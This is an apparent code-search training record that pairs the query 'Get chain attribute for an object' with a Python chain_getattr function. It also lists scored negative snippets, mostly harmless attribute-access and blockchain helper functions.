{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next(self):\n nextattr = self.iterobj.next()\n return (nextattr.name, self.attrs[nextattr.name])", "def _get_effective_attribute(self, attribute_name):\n result = []\n tmp = self[attribute_name]\n if tmp != None:\n result.append( tmp )\n if tmp == None or tmp.startswith('+'):\n for parent in self.get_parents():\n result.append( parent._get_effective_attribute(attribute_name) )\n if parent[attribute_name] != None and not parent[attribute_name].startswith('+'):\n break\n return_value = []\n for value in result :\n value = value.strip('+')\n if value == '': continue\n if value not in return_value:\n return_value.append( value )\n tmp = ','.join( return_value )\n tmp = tmp.replace(',,',',')\n return tmp", "def anchor(self):\n # self.attributes cannot be empty; will cause an error on init.\n return self.attributes[-1]", "def chain_getattr(obj, attr, value=None):\n try:\n return _resolve_value(safe_chain_getattr(obj, attr))\n except AttributeError:\n return value", "def _get_attr_recursive(self, name, memo=None):\n # `name` is dot-delimited, so split it up into distinct names:\n name_list = name.split('.')\n # The first name has special treatment, since it might need to\n # be dynamically built:\n top_attr_name = name_list[0]\n # NOTE: This raises AttributeError if the attribute doesn't\n # exist. (Optional attributes should exist and be None-valued)\n attr = getattr(self, top_attr_name)\n # If this is an optional attribute and it hasn't been explicitly\n # provided, build it dynamically:\n if attr is None and top_attr_name in self.default_values:\n attr = self.build_param(top_attr_name, memo=memo)\n # If there are no further identifiers, we're done!\n if len(name_list) == 1:\n return attr\n # Otherwise, recursively call getattr on each sub-identifier.\n else:\n return reduce(getattr, name_list[1:], attr)", "def MoveToNextAttribute(self):\n ret = libxml2mod.xmlTextReaderMoveToNextAttribute(self._o)\n return ret", "def get_attribute_value(self, typ, attr_name):\n for base_typ in self._get_mro(typ):\n serialized_base = self.serialize_type(base_typ)\n if serialized_base is None:\n continue\n value = self.attribute_values[serialized_base].get(attr_name)\n if value is not None:\n return value\n else:\n return UNRESOLVED_VALUE", "def select_attribute(instances, available_attributes, domain):\n\n\n entropies = {}\n for att in available_attributes:\n entropies[att] = entropy_new(instances, att, domain)\n \n next_attrib, (_ent, leaves) = min(list(entropies.items()), key=lambda x: x[1][0])\n \n return next_attrib, leaves", "def mineral_attr(attribute):\n return attribute[0]", "def __call__(self):\r\n return self[-1]", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def last_value():\n return blockchain[-1]", "def get_rel_attr(self, attr_name, model):\n rel_attr_name, attr_name = attr_name.split('.', 1)\n rel_attr = getattr(self.model, rel_attr_name, None)\n rel_model = None\n attr = None\n\n if rel_attr is not None:\n rel_model = rel_attr.property.mapper.class_\n attr = getattr(rel_model, attr_name, None)\n\n return (rel_model, attr)", "def get_last(self):\n return self.get_block(len(self.chain)-1)", "def get_radist_value(line):\n assert line.startswith(' ')\n key, value = line.split('=')\n key = key.strip()\n return key, attr_map[key](value)", "def get_last_blockchainvalue(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def deepgetattr(obj, attr):\n\t\treturn reduce(getattr, attr.split('.'), obj)", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def get_last_blockchain_value(self):\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def penultimate(self) -> OptCoordinates:\n if len(self) < 2:\n raise IndexError(\n \"Cannot obtain the penultimate set of \"\n f\"coordinates, only had {len(self)}\"\n )\n\n return self[-2]", "def _get_attribute(self):\n return self.split_text[1] if len(self.split_text) > 1 else \"\"", "def sequence_last(self):\n return max(list(self.nodes_attribute(name=\"_k\")))", "def __arb__(self):\n if self.tree.total < 1:\n return None\n if self.tree.total % 2 == 0:\n return self.first()\n else:\n return self.last()", "def get_leaves_attr(self, attr: str):\n\n return [getattr(q, attr) for q in self.leaves]", "def last_value(self):\n return self._value", "def get_attribute(self, lexeme: str) -> typing.Union[Attributes.Attributes]:\n return self._parent_node.get_attribute(lexeme)", "def last_percept(self):\n return self.percept", "def __getattr__(self, attr):\n for resource in lineage(self):\n if attr in resource.__initial_attrs__:\n value = self.__dict__[attr] = getattr(resource, attr)\n return value\n raise AttributeError(\n '{!r} object has no attribute {!r}'.format(self, attr))", "def __next__(self):\n self._iteration_index += 1\n if self._iteration_index < self._length:\n return self._child_values[self._iteration_index]\n raise StopIteration", "def get_attr_unwrapped(fun: callable, attr_name, *default_value):\n while fun:\n try:\n return getattr(fun, attr_name)\n except AttributeError:\n fun = getattr(fun, '__wrapped__', None)\n if default_value:\n return default_value[0]\n raise AttributeError(attr_name)", "def visit(self, node):\n super(_GetattrNodeVisitor, self).visit(node)", "def get_attribute(root, attribute):\n command_tree = [root]\n while command_tree:\n current_object = command_tree.pop()\n if hasattr(current_object, attribute):\n return getattr(current_object, attribute)\n\n parent = getattr(current_object, \"parent\", None)\n if parent:\n command_tree.append(parent)\n\n raise exception.ArestorException(\"The %(attribute)r attribute is \"\n \"missing from the object tree.\",\n attribute=attribute)", "def get_attr(attributes, name):\n try:\n return attributes.getValue(name)\n except KeyError:\n return None", "def _get_attr(self, attr, root=None):\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]", "def visit_Attribute(self, node):\n\n if isinstance(node.value, ast.Name):\n attr_str = \"%s.%s\" % (node.value.id, node.attr)\n if self._is_write_ctx(node.ctx):\n self.yield_checker.record_assignment(attr_str)\n else:\n self.yield_checker.record_usage(attr_str, node)\n\n root_value = self.visit(node.value)\n if self._is_write_ctx(node.ctx):\n return self._visit_set_attribute(node, root_value)\n elif self._is_read_ctx(node.ctx):\n if self._is_checking():\n self.asynq_checker.record_attribute_access(root_value, node.attr, node)\n value = self._get_attribute(node, node.attr, root_value)\n if self._should_use_varname_value(value):\n varname_value = VariableNameValue.from_varname(\n node.attr, self.config.varname_value_map()\n )\n if varname_value is not None:\n return varname_value\n if self.scope.scope_type() == ScopeType.function_scope:\n composite = self.varname_for_constraint(node)\n if composite:\n local_value = self.scope.current_scope().get_local(\n composite, node, self.state, fallback_value=value\n )\n if isinstance(local_value, MultiValuedValue):\n vals = [\n val\n for val in local_value.vals\n if val is not UNINITIALIZED_VALUE\n ]\n if vals:\n local_value = unite_values(*vals)\n else:\n local_value = UNINITIALIZED_VALUE\n if local_value is not UNINITIALIZED_VALUE:\n value = local_value\n value = self._maybe_use_hardcoded_type(value, node.attr)\n return value\n else:\n self.show_error(node, \"Unknown context\", ErrorCode.unexpected_node)\n return None", "def process(name, attr):\n\t\t\t\n\t\t\t# If no name has been defined, define it declaratively.\n\t\t\tif not getattr(attr, '__name__', None):\n\t\t\t\tattr.__name__ = name\n\t\t\t\n\t\t\t# If this attribute existed previously, clone the sequence number to preserve order.\n\t\t\tif name in overridden_sequence:\n\t\t\t\tattr.__sequence__ = overridden_sequence[name]\n\t\t\t\n\t\t\t# We give attributes a chance to perform additional work.\n\t\t\tif hasattr(attr, '__fixup__'):\n\t\t\t\tfixups.append(attr) # Record the attribute to prevent __get__ transformation later.\n\t\t\t\n\t\t\treturn name, attr", "def get_value(self):\n attr = getattr(self.obj, self.attr)\n try:\n args = self.args\n kwargs = self.kwargs\n return attr(*args, **kwargs)\n except AttributeError:\n return attr", "def try_scope_attr_until_success(self, attr_name):\n for i, scope in enumerate(reversed(self.scopes)):\n try:\n a = getattr(scope, attr_name)\n except NotInScopeError:\n # If not at outer scope, pass and try the next scope outwards.\n if i < len(self.scopes) - 1:\n pass\n # If at outer scope, it really hasn't been found.\n else:\n raise\n else:\n return a\n raise NotInScopeError", "def last_value(self):\n return self._last_value", "def getattr_recursive(self, name):\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, 'getattr_recursive'):\n # Attribute not present, child is wrapper. Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def _resolve_attr(self, obj, attrspec):\n attrssplit = attrspec.split(\".\")\n attr = attrssplit[0]\n try:\n obj = obj[int(attr)] # In case list element\n except ValueError:\n try:\n obj = obj[attr]\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n if len(attrssplit) > 1:\n attrspec = attrspec.partition(\".\")[2] # right part of the string.\n return self._resolve_attr(obj, attrspec) # Recurse\n return obj", "def getattr_recursive(self, name: str) -> Any:\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, \"getattr_recursive\"):\n # Attribute not present, child is wrapper. Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def _dqa(self, attr):\n if isinstance(attr, tuple) and not attr[0]:\n return attr[1]\n else:\n return attr", "def get_attr(self, value):\n return self.index[value]", "def value(self):\n if self.children == tuple():\n return sum(self.meta)\n total = 0\n for meta in self.meta:\n if 0 < meta <= len(self.children):\n total += self.children[meta-1].value()\n return total", "def deepgetattr(obj, attr, default=AttributeError):\n try:\n return reduce(getattr, attr.split(\".\"), obj)\n except AttributeError:\n if default is not AttributeError:\n return default\n raise", "def _get_value_by_attribute(self, die, attribute):\n # in the case of str form data `DW_FORM_strp`, return str\n if attribute.form == \"DW_FORM_strp\":\n return attribute.value.decode(\"utf-8\", errors=\"ignore\")\n\n # parse `DW_AT_decl_file`\n if attribute.name == \"DW_AT_decl_file\":\n if attribute.value == 0:\n return attribute.value\n lineprogram = die.dwarfinfo.line_program_for_CU(die.cu)\n file_entry = lineprogram.header.file_entry[attribute.value-1]\n file_name = file_entry.name.decode(\"utf-8\", errors=\"ignore\")\n file_dir_bytes = lineprogram.header.include_directory[file_entry.dir_index-1] # noqa: E501\n file_dir = file_dir_bytes.decode(\"utf-8\", errors=\"ignore\")\n return file_dir + \"/\" + file_name\n\n # if extra_info is not empty, return extra_info\n extra_info_func = _EXTRA_INFO_DESCRIPTION_MAP[attribute.name]\n extra_info = extra_info_func(attribute, die, self.section_offset)\n if extra_info:\n return extra_info\n\n # the last choice\n descr_func = _ATTR_DESCRIPTION_MAP[attribute.form]\n val_description = descr_func(attribute, die, self.section_offset)\n if val_description:\n return val_description\n\n return attribute.value", "def mineral_value(attribute):\n return attribute[1]", "def visit_Getattr(self, node):\n self.getattr_nodes.add(node)", "def rshift(self, attr):\n return self.set_child_and_return(shifter.rshift(self.statement, attr))", "def last_value(self):\n return 0", "def OnGetItemAttr( self, item ):\n if self.indicated > -1 and item == self.indicated:\n return self.indicated_attribute\n return None", "def get_attribute(self, attr):\n super().get_attribute(attr) # Keep this line, it triggers the parent class method.\n return getattr(self, attr)", "def last_value(self):\n return self._waveforms[-1].last_value", "def get_value(self):\n return self.last_value", "def lshift(self, attr):\n return self.set_child_and_return(shifter.lshift(self.statement, attr))", "def chained_getattr(obj, path):\n target = obj\n for attr in path:\n target = corner_case_getattr(target, attr)\n return target", "def _last_node(self):\n if self.trail[-1][1] is None or self.trail[-1][1].group():\n return self.trail[-1][0]\n else:\n return self.trail[-2][0]", "def deepgetattr(obj, attr, default=None, splitter='.', do_raise=False):\n try:\n return reduce(getattr, attr.split(splitter), obj)\n except AttributeError:\n if do_raise:\n raise\n return default", "def get_next(self):\n return self._next_previous_helper('next')", "def until_last(self, value: Any) -> List:\n matches = self._slice_helper(value, multiple_matches_forbidden=False)\n return type(self.parent)() if not matches else type(self.parent)(self.parent[:matches[-1]+1])", "def _get_node_attr(self, node, attr):\n return self.metrics[attr].ix[node]", "def _return_attr(self, *args, **kwargs):\r\n self.attr = [args, kwargs]\r\n return []", "def last_value(self):\n return self.samples[-1]", "def rget(obj, attrstr, default=None, delim='.'):\n try:\n parts = attrstr.split(delim, 1)\n attr = parts[0]\n attrstr = parts[1] if len(parts) == 2 else None\n if isinstance(obj, dict):\n value = obj[attr]\n elif isinstance(obj, list):\n value = obj[int(attr)]\n elif isinstance(obj, tuple):\n value = obj[int(attr)]\n elif isinstance(obj, object):\n value = getattr(obj, attr)\n if attrstr:\n return rget(value, attrstr, default, delim)\n return value\n except Exception:\n return default", "def get_attribute(self, attr):\n logger.debug(\"GET ATTRIBUTE {}\".format(attr))", "def value(self):\n return self.get_attribute(\"value\", str(self.children))", "def get_attr(graph: nx.Graph, attr: str):\n return [data[attr] for _, _, data in graph.edges.data()]", "def get_last_blockchain_value(self):\n # chekking if the blockchian is empty or not\n if len(self.__chain) < 1:\n return None\n return self.__chain[-1]", "def __getattribute__(self, name):\n x = object.__getattribute__(self, name)\n if name.startswith(\"_\"):\n return x\n schema_cls = object.__getattribute__(self, Schema.__name__)\n if name in schema_cls.relationships:\n if object.__getattribute__(self, PillowtalkBase.UNMARSHALL): # locking marshalling prevents recursion\n # Decide to use original value or fullfilled value...\n r = schema_cls.relationships[name]\n if type(x) is r.mod2: # if relationship is already fullfilled\n return x\n else:\n new_x = self.fullfill_relationship(name)\n if new_x is not None and new_x != [None] and new_x != []:\n return new_x\n if issubclass(x.__class__, Relationship):\n raise TypeError(\"Relationship \\\"name\\\" was not correctly resolved.\")\n return x", "def __getattribute__(self, attr_k):\n # Getting the value of the field\n attr = object.__getattribute__(self, attr_k)\n attr_type = type(attr)\n if issubclass(attr_type, Field) or \\\n issubclass(attr_type, ReferenceManyField):\n return attr.value\n else:\n return attr", "def attribute(self, attribute):\n value = 3\n if self.age == \"child\":\n value -= 1\n if attribute == \"physique\" or attribute == \"phy\":\n if self.age == \"adult\":\n value += 1\n if self.gender == \"male\":\n value += 1\n elif self.gender == \"female\":\n value -= 1\n\n if attribute == \"sensitivity\" or attribute == \"sns\":\n if self.age == \"child\":\n value += 2\n if self.gender == \"male\":\n value -= 1\n elif self.gender == \"female\":\n value += 1\n\n if attribute == \"agility\" or attribute == \"agi\":\n if self.age == \"child\":\n value += 1 # to be equally as high as adult and young\n elif self.age == \"elder\":\n value -= 1\n\n if attribute == \"mind\" or attribute == \"mnd\":\n if self.age == \"elder\":\n value += 1\n\n for feature in self.features:\n if feature.name == \"blood\":\n for key in feature.modifiers:\n if attribute == key:\n value += feature.modifiers[key]\n\n if value < 1:\n value = 1\n return value", "def chain_offset(self):\n return self._chain_offset", "def dunder_to_chained_attrs(value, key):\n if '__' not in key:\n return getattr(value, key)\n first_key, rest_of_keys = key.split('__', 1)\n first_val = getattr(value, first_key)\n return dunder_to_chained_attrs(first_val, rest_of_keys)", "def after_last(self, value: Any) -> List:\n matches = self._slice_helper(value, multiple_matches_forbidden=False)\n return type(self.parent)() if not matches else type(self.parent)(self.parent[matches[-1]+1:])", "def GetAttribute(self, attr):\n return self._attrs[attr]", "def attribute_value(self):\n return self._attribute_value", "def last_el(x):\n if N.isscalar(x): return x\n else: return x[-1]", "def last_block(self):\n return self.chain[len(self.chain) - 1]", "def latestValue(self):\n if len(self.values) > 0:\n return self.values[-1]\n else:\n return 0", "def get_next(item: str, after: dict) -> str:\n item_followers = after.get(item, None)\n if item_followers is None:\n return None\n if len(item_followers) == 1:\n return item_followers[0]\n else:\n for item in item_followers:\n if all(is_predeccessor(after, item, x) for x in item_followers if item is not x):\n return item\n else:\n item_followers.sort()\n to_return = item_followers[0]\n after[to_return].extend(item_followers[1:])\n return to_return", "def __getattribute__ (self, attr):\n attrib = object.__getattribute__(self, attr)\n if not isinstance (attrib, RField):\n return attrib\n if attr not in self.locals:\n self.locals.append (attr)\n if self.newobj:\n if self.keyvals.has_key (attr):\n return self.keyvals[attr]\n else:\n fieldobj = object.__getattribute__(self, attr)\n return fieldobj.default\n\n answer = r.get (self.prepare_key (attr, self.seq))\n fieldobj = object.__getattribute__(self, attr)\n if answer == None:\n answer = fieldobj.default\n else:\n if isinstance (fieldobj, ForeignKey):\n fkey = r.get (self.prepare_key ('__relationfor__', self.seq))\n cls = globals ()[fkey]\n return cls.objects.get (id = answer)\n\n return answer", "def getLast(self):\r\n return self._data[-1]", "def __getattr__(self, attr):\n return self.get(attr)", "def _PrevExpression(self):\r\n self.RestoreExpression()\r\n self.expressionindex-=1\r\n return self.SetExpressionByIndex(self.expressionindex)", "def getCustomAttribute(self):\n\t\treturn self.Attribute", "def get_last_blockchain_value():\n return blockchain[-1]", "def visit_Attribute(self, node):\n self.generic_visit(node)\n if isinstance(node.ctx, ast.Load):\n args = [ node.value, ast.Str(node.attr) ]\n return to_call(to_name('getattr'), args)\n return node", "def last_block(self):\n return self.chain[-1]", "def last_block(self):\n return self.chain[-1]", "def get_propattr(self, naam, attr):\r\n h = self._root.find(naam)\r\n if h is None:\r\n h = \"\"\r\n else:\r\n hh = h.get(attr)\r\n if hh is None:\r\n h = \"\"\r\n else:\r\n h = hh\r\n return h", "def visit_Attribute(self, node):\n new_node = ast.Name(\"%s.%s\" % (node.value.id, node.attr), node.ctx)\n return ast.copy_location(new_node, node)", "def get_effective_value(vals):\n lst = sorted(vals.values(), key=lambda x: -x[1])\n anchor = 0 # The highest priority non-relative value (with comb=None)\n while anchor < len(lst) and lst[anchor][2]:\n anchor += 1\n if lst[anchor][2]:\n ## TODO we should say which one :-D\n raise RuntimeError(\"Value set contains only relative values\")\n val = lst[anchor][0]\n for (relval, _, comb) in reversed(lst[:anchor]):\n val = comb(val, relval)\n return val", "def __getattr__(self, attr):\n # operator - run\n if self.processors[attr].__class__ == op:\n return self.processors[attr](self)\n\n # attribute - cache value\n if not attr in self.values:\n self.values[attr] = self.processors[attr](self)\n # return cached attribute value\n return self.values[attr]", "def get_last_deep_child(ast_node):\n if not hasattr(ast_node, \"body\"):\n return ast_node\n return get_last_deep_child(ast_node.body[-1])", "def _update_max(self):\n tmp = self\n while tmp.right is not None:\n tmp = tmp.right\n return tmp.parent.key", "def get_chain(self):\n return self.chain" ]
[ "0.594284", "0.59209895", "0.5796574", "0.54958975", "0.54589653", "0.54450005", "0.5416079", "0.53792626", "0.5287629", "0.52547", "0.5249592", "0.5235394", "0.5232", "0.522848", "0.52224046", "0.520934", "0.52058285", "0.51851255", "0.51851255", "0.51851255", "0.51851255", "0.51851255", "0.5172809", "0.51690716", "0.51599085", "0.5152098", "0.51518416", "0.5143727", "0.5132943", "0.5121552", "0.50954056", "0.5089884", "0.50580585", "0.5052904", "0.5048498", "0.5046069", "0.5042822", "0.50131184", "0.5012317", "0.49945736", "0.49671975", "0.49644873", "0.49591053", "0.4959009", "0.4954268", "0.4954217", "0.49523816", "0.49465883", "0.4926271", "0.49255848", "0.4905284", "0.49003384", "0.48878595", "0.4878786", "0.48781803", "0.48715326", "0.48647955", "0.48501676", "0.4848787", "0.484418", "0.4840426", "0.4826105", "0.48243883", "0.48238483", "0.48074463", "0.47991538", "0.47974068", "0.47971192", "0.47952214", "0.47816235", "0.47813964", "0.4773487", "0.47653052", "0.4764526", "0.47614354", "0.47571263", "0.47566754", "0.4750751", "0.4747438", "0.47462493", "0.47454005", "0.47418162", "0.47404858", "0.47395834", "0.47393548", "0.47270525", "0.47247416", "0.4721348", "0.4720253", "0.47194657", "0.4711449", "0.47043794", "0.47043794", "0.4701576", "0.47002566", "0.46997198", "0.46864247", "0.4681871", "0.46817696", "0.4681563" ]
0.5363558
8
Get chain attribute for an object.
def chain_getattr(obj, attr, value=None): try: return _resolve_value(safe_chain_getattr(obj, attr)) except AttributeError: return value
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def safe_chain_getattr(obj, attr):\n return reduce(getattr, attr.split('.'), obj)", "def chained_getattr(obj, path):\n target = obj\n for attr in path:\n target = corner_case_getattr(target, attr)\n return target", "def deepgetattr(obj, attr):\n\t\treturn reduce(getattr, attr.split('.'), obj)", "def get_attr(obj, attr):\n return getattr(obj, attr)", "def chain(self, chain_id, model_num = 0):\n return self.struct[model_num][chain_id]", "def get_object_attribute_from_filter(obj, components):\n\n try:\n return getattr(\n obj, components[-1] if hasattr(obj, components[-1]) else components[-2]\n )\n except: return None", "def getChain(self, chain):\n\n\t\tfor i in self.chain:\n\t\t\tif i.name == chain:\n\t\t\t\treturn i\n\n\t\treturn None", "def getattribute(objeto, name: str):\r\n # Get internal dict value matching name.\r\n value = objeto.__dict__.get(name)\r\n if not value:\r\n # Raise AttributeError if attribute value not found.\r\n return None\r\n # Return attribute value.\r\n return value", "def get_nested_attr(__o: object, __name: str, *args) -> Any:\n def _getattr(__o, __name):\n return getattr(__o, __name, *args)\n return reduce(_getattr, [__o] + __name.split('.')) # type: ignore", "def pget(self, name):\n getter = attrgetter(name)\n attr = getter(self.pobj)\n return attr", "def pget(self, name):\n getter = attrgetter(name)\n attr = getter(self.pobj)\n return attr", "def __get__(self, obj, objtype=None):\n if obj is None:\n return self\n if self._isdecorator():\n if self.fdec is None:\n raise AttributeError(\"can't decorate with attribute\")\n return self.fdec(obj)\n else:\n return super().__get__(obj, objtype)\n # if self.fget is None:\n # raise AttributeError(\"unreadable attribute\")\n # return self.fget(obj)", "def get_from_object(obj, attribute):\n jsonpath_expr = parse_path(attribute)\n return_list = [i.value for i in jsonpath_expr.find(obj)]\n if return_list:\n return return_list[0]\n return None", "def get_chain(self):\n return self.chain", "def get_chain(self):\n return self.chain", "def deepgetattr(obj, attr):\n for key in attr.split('.'):\n obj = getattr(obj, key)\n return obj", "def deepgetattr(obj, attr, default=None, splitter='.', do_raise=False):\n try:\n return reduce(getattr, attr.split(splitter), obj)\n except AttributeError:\n if do_raise:\n raise\n return default", "def get_chain(self, chain_id):\n if self.chain_dict.has_key(chain_id):\n return self.chain_dict[chain_id]\n return None", "def get_attr(self, name: str):\n return self.call(name)", "def get_chain(self):\n return self.segment.chain", "def get_chain(self):\n return self.segment.chain", "def deepgetattr(obj, attr, default=AttributeError):\n try:\n return reduce(getattr, attr.split(\".\"), obj)\n except AttributeError:\n if default is not AttributeError:\n return default\n raise", "def __getattribute__(self,name):\n try:\n return object.__getattribute__(self,name)\n except AttributeError:\n extraPO = object.__getattribute__(self,'_extraPO')\n\n if hasattr(extraPO,name):\n return getattr(extraPO,name) # HIDDEN!\n\n _attr_err_msg = object.__getattribute__(self,'_attr_err_msg')\n\n raise AttributeError(_attr_err_msg(name,[self,extraPO]))", "def _obj_getattr(obj, fqdn, start=1):\n node = obj\n for chain in fqdn.split('.')[start:]:\n if hasattr(node, chain):\n node = getattr(node, chain)\n else:\n node = None\n break\n return node", "def _getter(obj, attr):\n _get = attrgetter(attr)\n try:\n return _get(obj)\n except:\n return None", "def __getattribute__(self, name):\n # special attribute that need to go straight to this obj\n if name in ['pget', 'pobj', '_delegate', '_wrap', '_get', \n '__class__', '__array_finalize__', 'view', '__tr_getattr__']:\n return object.__getattribute__(self, name)\n\n try:\n return self.__tr_getattr__(name)\n except:\n pass\n\n if hasattr(self.pobj, name):\n return self._wrap(name) \n \n return object.__getattribute__(self, name)", "def get_attr(obj: Any, key: str):\n if key.strip() == \"\":\n return obj\n for k in key.split(\".\"):\n obj = getattr(obj, k)\n return obj", "def get_attr(obj: Any, key: str):\n if key.strip() == \"\":\n return obj\n for k in key.split(\".\"):\n obj = getattr(obj, k)\n return obj", "def __getattr__(self, attr):\n return getattr(self.obj, attr)", "def __getattr__(self, attr):\n return getattr(self.obj, attr)", "def csv_getvalue(obj, path):\n path = path.split('__', 1)\n attr_name = path[0]\n\n if obj is None:\n # Record object is empty, return None\n return None\n if len(path) == 1:\n # Return the last leaf of the path after evaluation\n attr = csv_getattr(obj, attr_name)\n\n if isinstance(attr, models.Model):\n # Attribute is a model instance. Return unicode.\n return unicode(attr)\n elif hasattr(attr, '__call__'):\n # Attribute is a callable method. Return its value when called.\n return attr()\n else:\n # Otherwise, assume attr is a simple value\n return attr\n elif len(path) == 2:\n # More of path is remaining to be traversed\n attr = csv_getattr(obj, attr_name)\n\n if attr is None:\n return None\n elif isinstance(attr, models.Model):\n # If attribute is a model instance, traverse into it\n return csv_getvalue(attr, path[1])\n else:\n raise AttributeError('CsvForm: Attribute \\'{0}\\' on object \\'{1}\\' is not a related model'.format(\n attr_name,\n obj._meta.object_name,\n ))", "def get_chain(self, chain_id):\n if self.default_model is None:\n return None\n if self.default_model.chain_dict.has_key(chain_id):\n return self.default_model.chain_dict[chain_id]\n return None", "def _get_attr(self, attr, root=None):\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]", "def __getattribute__(self, name):\n return object.__getattribute__(object.__getattribute__(self, 'orig'),\n name)", "def add_attr(chain, attrs):\n chain.TotBandEnergy = attrs.get(\"TotBandEnergy\")\n if attrs.get(\"climbSet\", False):\n chain.climbSet = True\n chain.climbers = attrs.get(\"climbers\")\n chain.locks = attrs.get(\"locks\")\n return chain", "def __getattr__(self, attr):\n return self.get(attr)", "def _get(self, name):\n return object.__getattribute__(self, name)", "def _get(self, name):\n return object.__getattribute__(self, name)", "def get(self, attr):\r\n return self.__dict__.get(attr)", "def get_value(self):\n attr = getattr(self.obj, self.attr)\n try:\n args = self.args\n kwargs = self.kwargs\n return attr(*args, **kwargs)\n except AttributeError:\n return attr", "def getSlotAttrib(cls, obj):\n attr = None\n if obj.__class__ in restslotattributedict.keys():\n attr = restslotattributedict[obj.__class__]\n return attr", "def _resolve_attr(self, obj, attrspec):\n attrssplit = attrspec.split(\".\")\n attr = attrssplit[0]\n try:\n obj = obj[int(attr)] # In case list element\n except ValueError:\n try:\n obj = obj[attr]\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n except (TypeError, KeyError, AttributeError):\n obj = getattr(obj, attr)\n if len(attrssplit) > 1:\n attrspec = attrspec.partition(\".\")[2] # right part of the string.\n return self._resolve_attr(obj, attrspec) # Recurse\n return obj", "def get_attribute(self, attr):\n logger.debug(\"GET ATTRIBUTE {}\".format(attr))", "def get_rel_attr(self, attr_name, model):\n rel_attr_name, attr_name = attr_name.split('.', 1)\n rel_attr = getattr(self.model, rel_attr_name, None)\n rel_model = None\n attr = None\n\n if rel_attr is not None:\n rel_model = rel_attr.property.mapper.class_\n attr = getattr(rel_model, attr_name, None)\n\n return (rel_model, attr)", "def get_attribute(self, name):\n\n pass", "def _get_attr_recursive(self, name, memo=None):\n # `name` is dot-delimited, so split it up into distinct names:\n name_list = name.split('.')\n # The first name has special treatment, since it might need to\n # be dynamically built:\n top_attr_name = name_list[0]\n # NOTE: This raises AttributeError if the attribute doesn't\n # exist. (Optional attributes should exist and be None-valued)\n attr = getattr(self, top_attr_name)\n # If this is an optional attribute and it hasn't been explicitly\n # provided, build it dynamically:\n if attr is None and top_attr_name in self.default_values:\n attr = self.build_param(top_attr_name, memo=memo)\n # If there are no further identifiers, we're done!\n if len(name_list) == 1:\n return attr\n # Otherwise, recursively call getattr on each sub-identifier.\n else:\n return reduce(getattr, name_list[1:], attr)", "def get_attributes(obj, attribute=None):\n # sliently return None when None is provided\n if obj is None:\n return None\n if isinstance(obj, list):\n if len(obj) == 0:\n return None\n obj = obj[0]\n if type(obj) is not dict or len(obj) == 0:\n logger.warn(\"unexpected format for obj: %s\", obj)\n return None\n cname = list(obj.keys())[0]\n if \"attributes\" not in obj[cname]:\n logger.warn(\"%s does not contain attributes: %s\", cname, obj)\n else:\n if attribute is not None:\n return obj[cname][\"attributes\"].get(attribute, None)\n # add children into 'attributes' so caller functions can pick up child nodes as well\n if \"children\" in obj[cname]:\n obj[cname][\"attributes\"][\"children\"] = obj[cname][\"children\"]\n if \"classname\" not in obj[cname][\"attributes\"]:\n obj[cname][\"attributes\"][\"classname\"] = cname\n return obj[cname][\"attributes\"]", "def check_attr(chain):\n attrs = {}\n if chain.climbSet:\n attrs[\"climbSet\"] = True\n attrs[\"climbers\"] = [int(i) for i in chain.climbers]\n attrs[\"locks\"] = chain.locks\n attrs[\"TotBandEnergy\"] = chain.TotBandEnergy\n\n return attrs", "def _fget(self):\n # type: (...) -> Any\n try:\n return getattr(self, private_attr)\n except AttributeError:\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n _get_type_name(type_), attr\n )\n )", "def chain_serial(self):\n return self.structure.chain_serial[self.mask]", "def rgetattr(obj, attr, *args):\n\n def _getattr(obj, attr):\n return getattr(obj, attr, *args)\n\n return functools.reduce(_getattr, [obj] + attr.split('.'))", "def get_attribute(self, lexeme: str) -> typing.Union[Attributes.Attributes]:\n return self._parent_node.get_attribute(lexeme)", "def __getattribute__(self, attr):\n try:\n return super(ObjectProxy, self).__getattribute__(attr)\n except AttributeError:\n info = sys.exc_info()\n try:\n return getattr(self._proxied, attr)\n except AttributeError:\n six.reraise(info[0], info[1], info[2].tb_next)", "def getattr(self, obj: t.Any, attribute: str) -> t.Any:\n try:\n return getattr(obj, attribute)\n except AttributeError:\n pass\n try:\n return obj[attribute]\n except (TypeError, LookupError, AttributeError):\n return self.undefined(obj=obj, name=attribute)", "def _get_object_prop(self, vm, attributes):\n result = vm\n for attribute in attributes:\n try:\n result = getattr(result, attribute)\n except (AttributeError, IndexError):\n return None\n return result", "def __getattr__ (self, attr):\n try:\n return self.get_value (attr)\n except exc.x_not_found:\n try:\n return self.get_key (attr)\n except exc.x_not_found:\n raise AttributeError", "def get_attribute(root, attribute):\n command_tree = [root]\n while command_tree:\n current_object = command_tree.pop()\n if hasattr(current_object, attribute):\n return 